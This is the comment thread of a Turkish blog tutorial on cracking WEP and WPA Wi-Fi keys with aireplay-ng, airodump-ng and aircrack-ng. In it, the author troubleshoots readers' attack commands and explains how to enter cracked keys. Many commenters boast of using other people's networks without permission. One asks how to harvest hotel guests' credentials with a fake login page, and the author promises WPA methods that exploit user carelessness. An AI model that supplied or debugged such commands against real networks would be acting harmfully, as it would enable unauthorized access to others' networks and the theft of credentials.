    Otellerden wep olan birini kırdım ve şuanda kullanıyorum. Diğer otellerde bazılarında sadece şifre bazılarında oda no ve şifre istiyor. ağa girip kullanıcıların oda ve şifresini nasıl yakalayabilirim pek anlayamadım. bu ağlarda 24 saat en az 10 kullanıcı oluyor. her bir otel ortalama bin yataklı. aklıma xaamp kurup fake bir giriş ekranı yapmaktan başka birşey gelmiyor. ip adresini aynı yapmayı denedim fakat başarı elde edemedim.

 123. #169 ibrahim tarafından, tarihinde

  Hocam öncelikle teşekkür ederim. Ben pardus kullanıyorum, sorunum aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 bölümünden sonra waiting diyor daha sonra kanal hatası gibisinden bir hata veriyor. Ayrıca WPA türünden şifre kırmaya çalıştım ondada bağlı kullanıcının bağlantısını koparırken aireplay-ng kullandığımda gene hata alıyorum. Ayrıca ağ kartım broadcom olarak geçiyor. Yardım edebilirmisiniz.

  • #170 ibrahim tarafından, tarihinde

   Hocam hata “The AP uses channel 11” şeklinde oluyor. AP kanal 11’i kullanır şeklinde.

  • #171 Murat Çeşmecioğlu tarafından, tarihinde

   broadcomm kartlar sorunlu diye biliyorum. kartınızı monitör moduna alabiliyor musunuz?

 124. #172 umut ömer tarafından, tarihinde

  hocam anlatım için teşekkürler hiç uğraşmadan 80000 de kırdım ve rahat rahat kullanıyorum

  • #173 Murat Çeşmecioğlu tarafından, tarihinde

   Çalıştığına sevindim. Kolay gelsin. 🙂

 125. #174 umut ömer tarafından, tarihinde

  ATHEROS AR9285 802.11b KULLANIYORUM 100 de 100 başarılı

 126. #175 serkan tarafından, tarihinde

  merhaba hocam sizi bayadan beri takip ediyorum.bir kaç tane wep şifresi kırdım.Şuan bir tane modem var wep korumalı.şifresinı kırmak istiyorum.Fakat kullnanıcı yok sahte trafik yapıyorum fakat Sending Authentication Request failde code 1 diye hata alıyorum modemde kullnıcı yok mac filtreleme olabilirmi teşekürler kolay gelsin..

  • #176 Murat Çeşmecioğlu tarafından, tarihinde

   Modemde kullanıcı bekleyeceksiniz ne yazıkki. Mac filtrelemesi olsaydı da siz bağlı olanları görebilirsiniz diye düşünüyorum.

 127. #177 10november tarafından, tarihinde

  10:33:06 Sending Authentication Request (Open System) [ACK]
  10:33:06 Authentication successful
  10:33:06 Sending Association Request [ACK]
  10:33:06 Denied (code 1), is WPA in use ?

  dedi ve kaldı..böylece devam edip duruyor….

  • #178 Murat Çeşmecioğlu tarafından, tarihinde

   Sanırım siz WPA şifrelemesi olan bir modemde WEP denemesi yapıyorsunuz.

   • #179 murat tarafından, tarihinde

    merhaba abi ben wmvare kullanıyorum sorun çıkmaz değilmi

 128. #181 Ufuk k tarafından, tarihinde

  usta bnm merak ettigim şu ben w7 kullanıyorumda w7 ile bu kırma işlemi olmaz mı olursa eger anlattıgınız adres verebilirmisiniz ve hngi proglamlar lazım
  daha yeni baslıyorumda yardım ederseniz sewnirim

 129. #183 engin tarafından, tarihinde

  murat hocam şifreyi kırdık ama farklı bi kod olarak verdi sanırım
  Key Forund: [ 10:29:38:47:56 ] diye yazıyor.
  bu kodu nasıl normal karaktere dönüştürebilirim.

  • #184 Murat Çeşmecioğlu tarafından, tarihinde

   Normal karaktere dönüştürmenize gerek yok. Şifre olarak: 1029384756 yazmanız yeterli

 130. #185 semih tarafından, tarihinde

  yardımcı olursan cok sevincem herşey tamam son aşama paket kırmada 370000 ivs oldu sürekli artıp şu hatayı alıyorm
  Failed next try with 370000.ivs diyor ve bu arada kaybolup geliyor
  beklemelimiyim daha normalmi herşey acil cvb bekliyorum
  saygılar..

 131. #186 Samir tarafından, tarihinde

  Interface Chipset Driver
  wlan0 Realtek RTL8187 rtl8187 -phy
  SIOCSIFFLAGS: Unknown error 132

  (monitor mode enabled on mon0)
  Kardeş bu sorunu nasıl çöze bilirim?
  airodump-ng -c 11 mon0 yazdığımda yine
  ioctl(SIOCSIFFLAGS) failed: Unknown error 132 hatasını alıyorum lütfen yardımcı olun. Azerbaycandan sayqılarla 🙂

 132. #187 Samir tarafından, tarihinde

  root@bt:~# iwconfig
  lo no wireless extensions.

  eth2 no wireless extensions.

  eth1 no wireless extensions.

  wlan0 IEEE 802.11bg ESSID:off/any
  Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
  Retry long limit:7 RTS thr:off Fragment thr:off
  Encryption key:off
  Power Management:off
  şunları on etmem mi gerekir?

 133. #188 Samir tarafından, tarihinde

  VmWare workstation üzerinden BT5 kullanıyorum

 134. #190 Samir tarafından, tarihinde

  Size teşekkür ederim. İnşallah çözerim sorunu.

 135. #191 Faruck tarafından, tarihinde

  airodump-ng -c 11 –bssid 00:18:39:2B:4C:98 –ivs -w deneme mon0

  kırılacak modem 6. kanalda ise bu komutu

  airodump-ng -c 6 –bssid 00:18:39:2B:4C:98 –ivs -w deneme mon0 diye mi yazıcaz

  Emeğiniz için teşekkürler

 136. #193 Serhat tarafından, tarihinde

  hocam dediklerinizi harfiyen yaptım benim kırmak istediğim web ağını windows tabanında görüyorum ama bu işlemi yaparken o modemi bulmuyor diğer bütün modemlerin buluyor sizce neden ?

 137. #194 MEKATRONİK tarafından, tarihinde

  airodump-ng wlan0

  bu kodda

  ioctl(SIOCSIFFLAGS) failed: Unknown error 132

  bu hatayı alıyorum . lütfen yardım …

 138. #195 Lepigor tarafından, tarihinde

  Hocam merhaba tp link wn 7200 kullanıyorum ağda hareket oluşturmaya calısıyorum olmuyor sizce neden her seyi doğru yapıyorum hiç bir web ağında bunu başaramadım … notebook un kendi kartı realtek 8191 onuda linux tanımıyor çok kötü moralim bozuk sende neden olabilir ufacık bir cevap lütfen

 139. #196 menderes tarafından, tarihinde

  konsol açıp iwconfig komutunu yazdığımda

  lo no wireless extensions.

  eth1 no wireless extensions.

  hatasını veriyo ağ kartımı tanımadığı anlamına mı geliyo ? bu sorunu nasıl çözebilirim
  bu arada notebook un wireless kartını kullanıyorum extra adaptör mü almam gerekir???

  • #197 Murat Çeşmecioğlu tarafından, tarihinde

   Orda görünmüyorsa tanınmamış olabilir. Kartınızın marka ve modelini aratıp daha detaylı bilgiye ulaşabilirisiniz.

 140. #198 burak tarafından, tarihinde

  Merhaba, Ben “Intel PRO/Wireless 2200BG Network Connection” Adaptörü kullanıyorumda. Yalnız BackTrack benim adaptörü görmüyor. Yani iwconfig yazınca etherneti görüyor, wirelessı göremiyor. Acaba bir çözüm yokmu ?

 141. #200 Fatih tarafından, tarihinde

  Hocam samir arkadaşın sorusuna cevap vermemişsiniz benimde sorunum aynı :((

  iwconfig wlan0 yapınca ilk yaptığım gibi MAC adresi çıkmadı 🙁

  ESSID: off/any olan sorunundan bahsediyorum yardımcı olursanız sevinirim?

 142. #202 yiğit tarafından, tarihinde

  programın linkini bulamadım =(

 143. #204 Buğra tarafından, tarihinde

  hocam iyi günler,benim sorunum ağda Data trafiğini başlatamıyorum.her 4 satırda bir gülen yüzler çıkıyor orda sorun yok,elde edeceğiniz veriyi tekrar gönderin demişssiniz.gerekli komutu yazıyorum,paketleri okumaya başlıyor.siz bir kaç paket okunduktan sonra demişsiniz.işte sorunum burda benim yaklaşık 1 saat bekledim bu bölümde binlerce paket topladı ama “Use this packet?”sorusu bir türlü gelmiyor.ne yapmam gerek hocam.

 144. #205 ibrahim tarafından, tarihinde

  broadcom chipsetli laptopmda denıyorum ag kartımı tanıyor dınleme moduna da alıyorum ancak sadece (monitor mode enabled) yazıyor mon0 gıbı bı terım yok napmalıyım

  • #206 Murat Çeşmecioğlu tarafından, tarihinde

   Mönitör moduna aldıktan sonra sadece airmon-ng yazdığınızda ne çıkıyor?

 145. #207 seyfi tarafından, tarihinde

  Murat bey merhaba;
  Ben backtrack 5 i wmvare (sanal makine) ye kurdum
  fakat usb wireless adaptörü backtrack 5 e tanıtamıyorum cd romu da göremiyorum. Bu sürücüyü nasıl tanıtacağım
  bt5 te bu nasıl olacak adaptörün Linux sürücüsü cd de olduğu halde bt5 te bunu göremiyorum . ifconfig wlan0 yazdığımda “device not found” yazıyor bi türlü çözemedim
  Yardımınız için teşekkürler.

 146. #208 kaan tarafından, tarihinde

  selam abi benim pc’de windows7 var. ben pc ‘ye vmware workstation ile backtarck5 i kurmak istiyorum bunu nasıl yapabilirim ayrıntılı bi şeklde anlatabilirimisin resimli olarak. şimdiden teşekkürler..

  • #209 Murat Çeşmecioğlu tarafından, tarihinde

   Resimli olarak anlatmam mümkün değil ne yazıkki. Ama mantığı şöyle: vmware kurduktan sonra bir sanal bilgisayar oluşturuyorsunuz. backtrack’in iso’sunu bu sanal bilgisayarın cd sürücüsüne takıp cdden başlatıyorsunuz. Daha sonra backtrack 5 açılınca masaüstündeki ikondan kurulumu gerçekleştirebilirsiniz.

 147. #210 ferkan özkaya tarafından, tarihinde

  :)murat bey anlatım için teşekkürler.ilkez denedim ve çokta fazla zorlanmadan kırdım anlattıklarınızla..

 148. #211 Furkan Tosun tarafından, tarihinde

  Murat hocam herşey tas tamam gidiyo en son aircrack-ng -a 1 deneme-01.ivs komutundan sonra opening deneme-01.iws
  open failed: No such file or directory
  Read 0 packet

  No networks found

  hatasını alıyorum dosyanın adınımı yanlış yazdım diye kontrol ettim ama doğru deneme. deneme-01 olarak denemedim sonuç aynı aynı hatayı wpa kıramaya çalışırkende almıştım

 149. #212 Ahmet9 tarafından, tarihinde

  Abi bende 7000 ıvs dyor ivs nedir cozum ne abi

 150. #214 fatma tarafından, tarihinde

  marhaba yardımcı olursanız sevinirim..airmon-ng start wlan0 yazdıktan sonra etraftaki paketleri buluyor ama mon0 çıkmıyor öylece kalıyor ne yapmak gerek acaba

  • #215 Murat Çeşmecioğlu tarafından, tarihinde

   airmon-ng; etraftaki paketleri toplamak için değil, kartınızı monitör moduna almak için. Paketleri buluyor diyorsanız zaten mon0’ı kullanıyorsunuzdur.

   • #216 fatma tarafından, tarihinde

    o zaman airmon-ng start wlan0 yazdıktan sonra gerisi gelmiyor diyeyim.. nedeni ne olabilir..

    • #217 Fatma tarafından, tarihinde

     Yani monitor moduna gecmiyor bir turlu

  • #218 fatma tarafından, tarihinde

   yanıtlarsanız sevinirim

 151. #219 Dogukan tarafından, tarihinde

  Evet benı tanıyorsun zten facebooktan 😀 sonunda blog dayız evet sorumuz geliyor.

  Sending Authentication Request (Open System)
  Hata bu WEP e saldırıyorum.
  Agda adamda var =)

  bilmiyorum sorun ne oLablir ?

  • #220 Murat Çeşmecioğlu tarafından, tarihinde

   Facebookta da söyledim, burda da söylüyorum. O hata değil. Yazıyı dikkatli incelersen anlayacaksın. 6. resmin altında yazanları okur musun?

   • #221 dogukan13 tarafından, tarihinde

    Sen benı yanlış anladın :s aynı sey deıl tmm anladım gordum o resmıde bak bende boyle devamlı devam edıyor 😀 gulen surat gelmıyor.

    İlk konsol deılde arka taraftakıne dıkkat edın bu hata devamlı boyle gıdıyor.

    http://c1202.hizliresim.com/u/h/2rp6g.png

    • #222 Murat Çeşmecioğlu tarafından, tarihinde

     Modemden kaynaklanan bir sorun bence bu. Ağda birileri varsa Fake Auth saldırırı yapmasan sadece o adamın paketlerini topla.

 152. #223 Ahmet tarafından, tarihinde

  Merhaba
  Windows’ta wep olarak gözüken backtrackta wpa2 olarak gözüküyor sebebi nedir acaba?

  • #224 Murat Çeşmecioğlu tarafından, tarihinde

   Ben bu durumda Backtrack’a inanırdım 🙂

   Windows’ta 5 haneli bir şifre yazıp girmeye çalışın, eğer WPA ise “8 karakterden az olamaz” diye hata verecektir.

 153. #225 InsideR tarafından, tarihinde

  Merhaba
  bt5r1 programını suanda ındırıyuorum
  VMware Workstation sanal pc kurararak bu ıslemlerı yapmak ıstıyorum.Lınuxun hangı surumunu tavsıye edersınız.
  TSkler

  • #226 Murat Çeşmecioğlu tarafından, tarihinde

   Backtrack 5 dağıtımının R1 sürümü zaten son sürümü. Yeterli olur.
   VMware yerine dual boot öneririm.

 154. #227 InsideR tarafından, tarihinde

  Murat Çeşmecioğlu :
  Backtrack 5 dağıtımının R1 sürümü zaten son sürümü. Yeterli olur.
  VMware yerine dual boot öneririm.

  ayrıca wordlıst ıcın lınk verirseniz sevinirim tskler

 155. #229 Dogukan tarafından, tarihinde

  genelde oluyor :S ama sadece bu deıl toplam 3 kişinin ki böyle oluyor.

 156. #230 Atakan tarafından, tarihinde

  abi bu aşamada kalıyorm 3 saat bkledm ama sürekli bu pakt read işlemi yapıyor sizn ‘y’ tuşuna basn dediğiniz kısıma geçemiyorum .

  Altta yaptığım aşama :

  Ben şu aşamaya : aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 geldikten sonra packet read işlemi hiç bitmiyor. Yani ;

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:08:5C:FE:E5:13 -h 00:08:5C:FE:E5:13 mon0
  The interface MAC (00:23:CD:BD:A1:96) doesn’t match the specified MAC (-h).
  ifconfig mon0 hw ether 00:08:5C:FE:E5:13
  42851 packets…

  Uzun süre böyle kalıyor. Packetler artıyor ama iş neticeye bağlanmıyor, nası yapıcaz?

 157. #231 mehmet tarafından, tarihinde

  abi olmuyo ühühühüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü

  • #232 Murat Çeşmecioğlu tarafından, tarihinde

   Ağlanacak birşey yok sakin olun 🙂
   Nerde sorun yaşadığınızı yazın, çözüm bulmaya çalışalım.

 158. #233 InsideR tarafından, tarihinde

  merhaba
  hp laptop kullanıyorum broadcom wirelessi bulunmakta bunu devre dısı bıraktım.bunun yerine usb2,0 realtek trl8187 wireless 54mbps usb 2,0 wireless adaptor kullanıyorum.fakat iwconfig yazdıgımda wireless olarak gormemektedir.Bunun ilgili yapabileceğim bir işlem varmı?
  Ayrıca blacktrack i destekleyen wireless cihaz listesi varsa sevinirim.simdiden tesekkurler

 159. #235 Atakan tarafından, tarihinde

  Benim sorunuma baktınız mı ? pc başnda sizi bekliyorum ??

 160. #236 Atakan tarafından, tarihinde

  BEnim sorunuma bakacak yok mu ?????

 161. #237 ismail tarafından, tarihinde

  Ben şu aşamaya : aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 geldikten sonra packet read işlemi hiç bitmiyor. Yani ;

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:08:5C:FE:E5:13 -h 00:08:5C:FE:E5:13 mon0
  The interface MAC (00:23:CD:BD:A1:96) doesn’t match the specified MAC (-h).
  ifconfig mon0 hw ether 00:08:5C:FE:E5:13
  42851 packets…

  Uzun süre böyle kalıyor. Packetler artıyor ama iş neticeye bağlanmıyor y ye basıp kapatcazm ama o sos-ru gelmiyo işte.s

 162. #238 nuri sekmen tarafından, tarihinde

  Murat abi batrack indirmek için link göndere bilirmisin?

 163. #240 muzaffer şanlı tarafından, tarihinde

  çok teşekkür ederim sana abe telden açıp uyguladım dediklerini şifre çözdüm çok sağolasın..

 164. #241 ömer tarafından, tarihinde

  Merhaba Murat Bey;
  Önce çalışmalarınız için tebrik ediyorum.Talimatları tamı tamına uyguladım fakat benim bulunduğum kanalı -1 olarak gösteriyor dolayısıyla diğer wireless ağlarının olduğu kanallar ile sahte trafik oluşturamıyorum(fixed channel: -1) olarak gösteriyor. Yukarıda 4. resimde bende çıkan fixed channel dışında herşey aynı ”CH 11][Elapsed 1 min][gg.yyyy.][fixed channel -1]”

 165. #242 Burak tarafından, tarihinde

  ben 1 tane wep buldum agda kımse yoktu kendım ag trafıgı olusturmak ıstedıgımde su hatayla karsılasıyorm acıl yardım cevaplarınız ıcın sımdıden tesekkurler

  hata:

  Sending Authentication Request (Open System)

  Attack was unsuccessful.

  Possible reasons:

  * Perhaps MAC address filtering is enabled.

  * Check that the BSSID (-a option) is correct.

  * Try to change the number of packets (-o option).

  * The driver/card doesn’t support injection.

  * This attack sometimes fails against some APs.

  * The card is not on the same channel as the AP.

  * You’re too far from the AP. Get closer, or lower
  the transmit rate.

 166. #243 furkan tarafından, tarihinde

  murat abi konuyu anladım ama bu ıslemlerde bıze lazım olacak seyler backtrack 4 ile wireles aygıtımı baska bıseye ıhtıyacımız varmı _?

 167. #244 aliakın tarafından, tarihinde

  merhabalar,
  wpa kırmayak için uğraşırken bir sorun ile karşılaştım, handshake yakalayıp yakalayamadığımı tam olarak göremedim yani sağ üstte çıkmadı siz de belirtmişsiniz handshake çıkmayabilir diye.Kıracağım wpa nın BSSID ve STATİONU nun mac adresini aldım ve aricrack komutuna geçtim
  aircrack-ng -a 2 wpadeneme-02.cap -w 8hanelirakamlar.txt yazınca ; “fopen(dictionarty) failed:no such file or directory” Ouitting aircrack-ng…”yazısı geliyor
  problem nerede olabilir acaba toplanan packet 6 yazıyor bu mu yeterli değil.bir so
  rum daha olacak Windows ile backtrackı aynı anda kullanıyorum ve her seferinde boot ederek açıyorum windowsta indirdiğim wordlistleri nasıl backtrackta kullanabilirim yani yolunu nasıl belirtmeliyim sda1/wordlistler/8hanelirakamlar.text yazsam yeterli olur mu(wordlistler c:/ de)yoksa masaüstünde olması şart mı?

 168. #245 Murat tarafından, tarihinde

  aircrack-ng satırlı komutu uyguluyorum ama failed alıyorum, next try with 5000 ivs die.. toplanan data(paket) 178.587 olduğu halde

 169. #246 S€z€R tarafından, tarihinde

  Sa… Syn Admin Sizin Dediklerinizi ßen Vm Uzerınden Bt5 e uyguladım herSey Tmm Ama ßır Sıkntı Var Kaydettıgımız Paketlerı Kırma ısıne Geldıgımızde ör: aircrack-ng -a 1 back-01.ivs < ßenım kayıt ısmım Back < oldugu ıcın ısım Degısık ßu komutu Verdıgımde ßır Sıfre kırımı Gorunmuyor + Failed.Next try with 5000 Ivs. Diyor' YanLıs Nerde Acaßa ßılgılendırırsen Sevınırız..

  • #247 Murat Çeşmecioğlu tarafından, tarihinde

   Bu uyarı topladığınız paket sayısı yetersiz olduğunda çıkar. Daha fazla paket toplamalısınız.

 170. #248 Ahmet Cahit tarafından, tarihinde

  tesekkurler anlatim icin airmon-ng start wlan0 yazdiktan sonra devam etmiyo interface chipset driver yaziyor kaliyor wirelles kartini tanimamis mi acaba

 171. #250 erol demirkol tarafından, tarihinde

  murat abi ben bugüne kadar neredeyse 10 a yaklaşık wep kırdım senin sayende. kodları ezbere yapar oldum.. benim sükrekli baglandıgım bir adres vardı ayıptır söylemesi 1 yılı akın bir süredir kullanıyordum fakat gecenlerde sınırlı baglantı veya bağlantı yok diyor die hata alıyorum bağlanamıyorum.. bunun sebebi ise şifre değiştirmişler helade ama ag halan wep. kırmak için tüm işlemleri sıraıyla oluşuruyorum gereken trfigi yapıyorum fakat data bölümü hiç dolmuyor denecek sekilde yavaş. hatasız yapmama ragmenn data bölümüü dolmuyorr abi yardımcı olurmusun bunun sebebi ne ?

 172. #251 Ahmet tarafından, tarihinde

  Ben iwconfig komutunu veriyorum ancak sadece lo yazısı çıkıyor ve onda da no wireless bilmem ne yazıyo. Grundig nb1020 netbook var bende. Realtek rtl8191se pci ağ kartı var

 173. #253 baran tarafından, tarihinde

  bende wlan0 bulunamıyor.eth0 ve l0 hakkında uzun uzun bilgi veriyor. MAC adresinide yazıyor.Ancak wlan0 yok. ne yapabilirm.

  • #254 Murat Çeşmecioğlu tarafından, tarihinde

   Kartınızı tanımamış olabilir. Kartınızın markasını ve modelini yazabilir misiniz?

 174. #255 Rohat tarafından, tarihinde

  bende wlan0 görünmüyor.birde root@root yazıyor neyapmalııym.yardım edermisin.

 175. #256 sek can tarafından, tarihinde

  iwconfig yazdıktan sonra sadece “NO WIRELESS EXTENSION” yazıyo. devamını getiremiyorum

 176. #258 Rohat tarafından, tarihinde

  Atheros AR9285 Wireless Network Adapter

  NVIDIA GeForce GT 335M

 177. #259 ff28 tarafından, tarihinde

  Selamlar Murat abi benim bi sorum olacak mac filtrelemeli bir wep ağın şifresini anlattığınız gibi kırabilirmiyiz yoksa farkli bir islem var mi ?

 178. #261 EA tarafından, tarihinde

  ascii den hex çevirme programı var mı varsa link atarmısın.
  birde wpa şifresini kırmanın başka yolları var mı?

  • #262 Murat Çeşmecioğlu tarafından, tarihinde

   WPA’yı kırmanın 1-2 yolu daha var ama biraz kullanıcının dalgınlığından yararlanmak gerekiyor. Kısa sürede paylaşmayı düşünüyorum.
   Ascii’den HEX’e çevirmek için şu adresi kullanabilirsiniz. Kendi yaptığım bir program da var. Onları paylaştığım zaman yayınlayacağım
   http://www.dolcevie.com/js/converter.html

 179. #263 Ümit C.Y. tarafından, tarihinde

  murat hocam son işleme geliyorum aircrack-ng -a 1 deneme-01.ivs ye yaklaşik 28000000 paket topladim 😀 hata veriyor hata failed. Next try with 5000 IVs.

  • #264 Murat Çeşmecioğlu tarafından, tarihinde

   Daha önce kırdığınızı yazmşsınız. Belki atladığınız bir adım vardır ya da modem farklı olduğu için sorun çıkmış olabilir.

 180. #265 alp tarafından, tarihinde

  toplanan paket sayısı 91,000
  amam “Failed .Next try with 90000 IVs “diye bir uyarı çıkıyor ve bir müddet sonra tekarar bir işlem yapılyor 90000 sayısı değişiyor ..sorun ne olabilir.

  • #266 Murat Çeşmecioğlu tarafından, tarihinde

   Bir sorun yok, gayet normal. Topladığınız paketlerin yetmediğini ve daha fazla paket toplayıp tekrar denediğini gösteriyor.

 181. #267 demre tarafından, tarihinde

  murat hocam selamlar orda elde ettiğiniz veriyi geri gönderme aşamasında siz 19 packet te bulmuşsunuz benim paketler 10000 falan oldu bişey yok “Use this packet?” sorusu gelmedi ne yapmalıyım

 182. #268 mazlum tarafından, tarihinde

  Murat bey, ağda kimse olmayan kısma kadar geldim. Demişsinizya kendimiz trafik oluşturacaz. Komutları giriyorum aramıyor. Şöyle diyor, waiting for beacon frame …
  Mon is on channel 4, but the AP uses channel 6
  ne yapmaliyım

  • #269 Murat Çeşmecioğlu tarafından, tarihinde

   Modem’in 6. kanalda çalıştığını fakat sizin 4. kanalda olduğunu söylüyor. Kartınızı dinleme moduna geçirirken airmon-ng start wlan0 6 komutunu kullanın ve airdump-ng komutlarında -c 6 parametresini kullanın.

 183. #270 Ahmetix tarafından, tarihinde

  murat hocam sağolun 17 bin pakette kırdı bir wep şifresini beiniye göre çok hızlı bu arada backtrack 5 wmvare kalıbı üzerinden kullandım.

 184. #272 Ea tarafından, tarihinde

  murat abi senin dediğin yöntemle bir wep kırdım.ancak başka bir tane daha kırıyordum ki data paketi 150.000 aştı ama hala aircrack te şifreyi kırmıyor. sürekli 5-10 bin fazlasını istiyor.ama bir sonuç alaöıyorum acil yardım

 185. #273 salsero tarafından, tarihinde

  abi ben programı kurdum gerekli dosyaları c ye attım menu.lts nin içeriğini de kontro lettim ama gene de error 15 hatasını veriyor napcam? (win7 64 bit)

 186. #275 baran tarafından, tarihinde

  merhaba murat hocam geçenlerde bu yazınız ile bir tane wep ile şifrelenmiş ağın şifresine başarı ile ulaştım. Bir tane daha denemek istedim ve “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0” bu kısımdan sonra paketleri okumaya devam ediyor. y tuşuna basmak için o ekran gelmiyor? modem tp-link

 187. #277 bilal tarafından, tarihinde

  Murat abi ne kadar packages okursam okuyayım use this packages sorusunu somuyor dolayısı ile de data m hiç artmıyor bu sorunu nasıl aşabilirim? bir kaç tane wep kırdım fakat bir tanesinde takıldım.yardımcı olursan sevinirim teşekkürler

  • #278 Murat Çeşmecioğlu tarafından, tarihinde

   Durdurup tekrar denemeyi deneyin. Modemden kaynaklı da olabilir. Ağda birileri varsa onların paketlerini toplamayı bekleyin.

 188. #279 kasım tarafından, tarihinde

  murat hocam herşeyi doğru yaptım hatta yanlış bişey vardır diye reset atıp tekrar yaptım KEY FOUND! [ 12:34:56:78:90 ] yazıyor ascii gelmiyor wicd network managerde ayarlar kısmından hex olarak girmeyi yaptım ama bad password yazıyor bağlanmıyor

  • #280 Murat Çeşmecioğlu tarafından, tarihinde

   İki noktaları yazmıyorsunuz değil mi? WICD üzerinde Connect butonuna basında Key yazan kısma aralarda iki nokta olmadan 1234567890 şeklinde yazmanız yeterli. Aynı şifreyi Windows ortamında da iki nokta olmadan kullanabilirsiniz.

 189. #281 salim calta tarafından, tarihinde

  murat bey verdiğiniz bilgilier için çok çok teşekkür ederim bu siteden okuduklarımla bayağı bir şifre kırdım… fakat bana göre çetrefilli bir modeme denk geldim sorunlarıma yardımcı olursanız sevinirim
  paket toplamayı hızlandırmak için verdiğimiz komutu kullanınca gülen yüzler yerine

  sending authentication request (open system) ACK
  authentication successful
  sending association
  got a deauthentication packet (waiting 7 seconds)

  bu ne demektir ?

  gibi yükselen sayılarla 7 saniye-8 saniye 9 saniye
  diye yükseliyor buda paket toplamamı engelliyor gibime geliyor

  birde modeme bağlı 6 ayrı kullanıcı görmeme rağmen data çok yavaş birikiyor

  daha önceden tek kullanıcı ile 10 dakikada kırdığım şifreler var bu beni zorladı

  yardımcı olursanız sevinirim.

 190. #283 Ahmet Cahit Yasa tarafından, tarihinde

  Murat abi karti dinleme moduna aldigimda
  bununla karsilasiyorum devam etmiyor yardim edebilirmisin

  root@root:~# airmon-ng start wlan0

  Found 5 processes that could cause trouble.
  If airodump-ng, aireplay-ng or airtun-ng stops working after
  a short period of time, you may want to kill (some of) them!

  PID Name
  2417 dhclient3
  2470 dhclient3
  3157 wpa_supplicant
  3163 dhclient
  3182 dhclient
  Process with PID 2417 (dhclient3) is running on interface wlan0
  Process with PID 3157 (wpa_supplicant) is running on interface wlan0
  Process with PID 3182 (dhclient) is running on interface wlan0

  Interface Chipset Driver

 191. #284 Ümit CY tarafından, tarihinde

  Hocam merhaba 140 bin paket topladim son asamaya gectigimde failed . Next try with 5000 IVs hatasi aliyorum bunun bir caresi yok mu islemi 3 kere yaptim hep yni hata lutfen yardim edin

 192. #285 Ümit C.Y. tarafından, tarihinde

  son adım olan aircrack-ng -a deneme-01.ivs dediğim zaman ” Failed . Next try with 5000 İVs ” hatası alıyorum 200 bini aşkın paket topladım paketle alakalı bir sorun mu çözümü internettede yok :S

 193. #286 Orçun tarafından, tarihinde

  Murat bey ben de senin sadece 19 paket topladığın bolumde takılıyorum. CTRL+Z ile durdurup tekrar tekrar denememe ragmen, use this packet sorusunu sormuyor. 10000 20000 paket topladım kaç kere…

 194. #288 Kamuran GÜRER tarafından, tarihinde

  dostum anlatımın ve yardımların için çok çok teşekkürler. çok işime yaradılar. tek sıkıntım
  53:74:70:86:03
  kodunu şifre olarak verdi. ascii kodu olduğunu düşünerek çözmeye kalktım ancak 03’ün karşılığını bulamadım. şifreyi iki kere kırdım ikisinde de aynı sonuç verdi.
  5JFV
  olarak ilk 4 hane tamam da son karakteri çözemedim.

  • #289 Murat Çeşmecioğlu tarafından, tarihinde

   Ascii olmasına gerek yok. Farkındaysanız orda bir cep telefonu numarası yazıyor. 10 haneli şekilde yazarsanız bağlanır.

 195. #290 delikurt tarafından, tarihinde

  sa “aireplay-ng -1 2 -o 10 -q 10 -a -h mon0” kod kullanımını bu şekilde yapıyorum mac adreslerini yazıyorum yukardaki gibi ama hata veriyor not:kullandığım sistem pardus 2011.2

 196. #292 delikurt tarafından, tarihinde

  usta birde şöyle birşey var modem kendi modemim access point olarak kullanıyorum o yüzden veri trafiği var ve o kodlara gerek kalmadan topladım paketleri ama 120000 oldu hala hata verip 185000 iv’s toplamamı istiyor

 197. #294 Kamuran GÜRER tarafından, tarihinde

  Dostum sanırım yanlış anlattım 🙂
  bir wep şifresini kırdım ve karşılığında

  key found 53:74:70:86:03
  decrypted 100%

  gibi birşeyler yazdı. bu kodu yanlış bilmiyorsam ascii karakterlere çevirmem gerekiyor. işte burada zorlanıyorum.

  53 ün ascii karşılığını “S”
  74 ün ascii karşılığını “t”
  70 in ascii karşılığını “p” olarak buldum
  ancak “86” ve “03” ün ascii karşılıklarını bulamadım bu konuda yardım ederseniz sevinirim.

  • #295 Murat Çeşmecioğlu tarafından, tarihinde

   Hayır yanlış anlatmadığnız. O sayıları asciiye çevirmenize gerek yok.

   WEP şifreleri 5 veya 13 ASCII karakterden YADA 10 veya 26 HEX değerden oluşmalı. Yani;

   Şifreniz “qwert” olabilir -> 5 ascii karakter,
   Şifreni “7177657274” olabilir -> 10 hex karakter,
   Şifreniz “asdfghjklizxc” olabilir -> 13 ascii karakter,
   Şifreniz 26 haneli bir hex değer de olabilir.

   Sonuç olarak eğer modeminizin şifresi qwert ise; siz bağlanırken 7177657274 yazabilirsiniz.

   Bu durum da aynı şekilde: Şifreyi koyan kişi ascii olarak düşünmemiş. Cep telefonu numarasını yazmış ve bu numara 10 haneli olarak hex bir değer oluyor. Siz bağlanırken gireceğiniz şifreye 5374708603 yazarsanız bağlanabilirsiniz. Ascii’ye çevirmenize gerek yok.

 198. #296 gunner tarafından, tarihinde

  Öncelikle bilgiler için teşekkürler.
  aireplay-ng -1 2 -o 10 -q 10 -a 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 komutundan sonra

  17:24:33 Waiting for beacon frame (BSSID: D0:D0:FD:68:F7:93) on channel -1
  17:24:33 mon0 is on channel -1, but the AP uses channel 13
  hatasını alıyorum lutfen yardımcı olun

  • #297 Murat Çeşmecioğlu tarafından, tarihinde

   Dinleme moduna elle almanız gerekiyor sanırım. aireplay-ng komutundan önce iwconfig mon0 channel 13 komutu yazıp öyle devam edin.

 199. #298 ofy tarafından, tarihinde

  Merhaba hocam’ failed next try with 5000 ivs hatasi aliyorum nedir acaba bu?

 200. #299 ofy tarafından, tarihinde

